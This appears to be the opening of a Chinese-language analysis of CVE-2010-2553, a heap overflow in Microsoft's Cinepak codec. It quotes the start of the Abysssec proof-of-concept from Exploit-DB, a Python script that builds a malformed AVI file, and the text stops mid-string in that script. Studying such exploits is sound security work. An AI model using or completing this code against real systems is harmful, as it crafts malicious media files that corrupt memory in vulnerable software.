[CVE-2010-2553] Microsoft Cinepak Codec CVDecompress - Heap Overflow(堆溢出分析)
0x00 参考 https://www.exploit-db.com/exploits/15112/ poc: ''' __ __ ____ _ _ ____ | \/ |/ __ \ /\ | | | | _ \ | \ / | | | | / \ | | | | |_) | | |\/| | | | |/ /\ \| | | | _ < | | | | |__| / ____ \ |__| | |_) | |_| |_|\____/_/ \_\____/|____/ http://www.exploit-db.com/moaub-26-microsoft-cinepak-codec-cvdecompress-heap-overflow-ms10-055/ ''' ''' Title : Microsoft Cinepak Codec CVDecompress Heap Overflow Version : iccvid.dll XP SP3 Analysis : http://www.abysssec.com Vendor : http://www.microsoft.com Impact : High Contact : shahin [at] abysssec.com , info [at] abysssec.com Twitter : @abysssec CVE : CVE-2010-2553 MOAUB Number : ''' import sys def main(): aviHeaders = '\x52\x49\x